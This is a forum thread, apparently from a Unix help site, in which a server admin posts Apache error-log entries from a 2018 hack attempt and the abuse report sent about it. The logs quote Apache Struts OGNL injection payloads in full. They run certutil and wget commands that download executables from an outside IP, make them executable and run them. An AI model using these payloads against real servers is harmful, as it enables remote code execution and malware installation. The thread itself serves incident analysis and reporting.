Web Hack Attempt from whois 209.126.68.6


Login or Register for Dates, Times and to Reply

 
Thread Tools Search this Thread
# 1  
Web Hack Attempt from whois 209.126.68.6

Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs:

Code:
$ cat error.log

Code:
[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: [client 209.126.68.6:45105] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.641285 2018] [core:error] [pid 1268] (36)File name too long: [client 209.126.68.6:45119] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.669095 2018] [core:error] [pid 3624] (36)File name too long: [client 209.126.68.6:45134] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop) &').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> ')

Examine carefully in code above including this executable file in the code:

Code:
 wget -O .loop http://111.90.158.225/d/ft32

and

Code:
wget -O .loop http://111.90.158.225/d/ft64

# 2  
Note:

Code:
to:	        abuse@shinjiru.com.my, ipadmin@primary.net
date:	        Nov 20, 2018, 11:06 AM
subject:	Hacker / Attacker at IP addresses 209.126.68.6 and 111.90.158.225

Quote:
Hi.

We have firm evidence of someone at 209.126.68.6 attempting to execute malicious javascript code which downloads malware from 111.90.158.225.

Here is the log file entries (which we have blocked):
# 3  
See also:

Code:
$:/var/log# grep 209.126.68.6 *log
auth.log:Nov 19 18:56:44 www sshd[5799]: Did not receive identification string from 209.126.68.6 port 41023

# 4  
# 5  
See all this PDF:

https://infosec.cert-pa.it/analyze/7...5e1d793b4b.pdf

Google 111.90.158.225 to learn more if you are interested in malware.
Login or Register for Dates, Times and to Reply

Previous Thread | Next Thread
Thread Tools Search this Thread
Search this Thread:
Advanced Search

4 More Discussions You Might Find Interesting

1. What is on Your Mind?

Whois Lookup

Hi. I've just made our internal Whois lookup service available for all forum users, not only moderators and admins. Whois Database It's basically the same whois info you can get from your command line and many other web sites. If you would like to see other features, please post in... (0 Replies)
Discussion started by: Neo
0 Replies

2. Shell Programming and Scripting

SFTP return Error Code 126

Hi, We are getting the following error code while connection remote server using sftp command. sftp user@serrver Warning: child process (/opt/ssh2/bin/ssh2) exited with code 126. pls Advise. (2 Replies)
Discussion started by: koti_rama
2 Replies

3. UNIX for Advanced & Expert Users

Exit Status 126 - how to get rid of it

Hi All, I have a small application hosted on apache-tomcat 5. Basically its a html page which in turn calls a perl script residing on unix server. Through this perl script i am calling a shell script using system command , like system('scriptname.sh',arg1,arg2,arg3); Now in the script... (5 Replies)
Discussion started by: glamo_2312
5 Replies

4. AIX

ar: 0707-126

Trying to build code on IBM_AIX 5.3. Following error occured during build. ar: 0707-126 $projdir/obj/ibm/5.3/NewApp/NewApp.o is not valid with the current object file mode. Use the -X option to specify the desired object mode. ANy help is appreciated to resolve the error. (2 Replies)
Discussion started by: milindb
2 Replies

Featured Tech Videos